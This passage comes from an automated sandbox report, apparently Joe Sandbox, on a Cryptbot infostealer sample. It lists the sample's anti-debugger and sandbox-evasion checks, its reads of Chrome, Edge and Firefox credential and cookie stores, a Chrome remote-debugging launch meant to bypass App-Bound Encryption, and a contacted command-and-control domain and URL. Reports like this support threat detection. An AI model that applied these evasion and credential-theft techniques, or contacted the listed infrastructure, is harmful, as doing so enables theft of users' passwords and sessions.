Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004F8230 LoadLibraryA,GetProcAddress,FreeLibrary,ResetEvent,GetLastError, 8_2_004F8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004F116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_004F116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004F1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_004F1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004F11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_004F11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_004F13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_004F13C9
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6BE184D0 cpuid 8_2_6BE184D0
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 8.2.service123.exe.6bd90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 6192, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561635 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Antivirus / Scanner detection for submitted sample 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 6 other signatures 2->60 7 file.exe 5 3 2->7         started        12 service123.exe 2->12         started        14 service123.exe 2->14         started        process3 dnsIp4 40 fvtekk5pn.top 34.116.198.130, 49730, 49737, 49738 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 7->40 42 127.0.0.1 unknown unknown 7->42 44 home.fvtekk5pn.top 7->44 34 C:\Users\user\...\unmYCIPOHmXNjqOesrEy.dll, PE32 7->34 dropped 36 C:\Users\user\AppData\...\service123.exe, PE32 7->36 dropped 62 Attempt to bypass Chrome Application-Bound Encryption 7->62 64 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 7->66 68 7 other signatures 7->68 16 service123.exe 7->16         started        19 WerFault.exe 21 16 7->19         started        22 chrome.exe 7->22         started        25 schtasks.exe 1 7->25         started        file5 signatures6 process7 dnsIp8 48 Multi AV Scanner detection for dropped file 16->48 50 Found evasive API chain (may stop execution after checking mutex) 16->50 52 Found stalling execution ending in API Sleep call 16->52 32 C:\ProgramData\Microsoft\...\Report.wer, Unicode 19->32 dropped 38 239.255.255.250 unknown Reserved 22->38 27 chrome.exe 22->27         started        30 conhost.exe 25->30         started        file9 signatures10 process11 dnsIp12 46 www.google.com 142.250.181.100, 443, 49744, 49746 GOOGLEUS United States 27->46
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
www.google.com 142.250.181.100 true
fvtekk5pn.top 34.116.198.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
    		high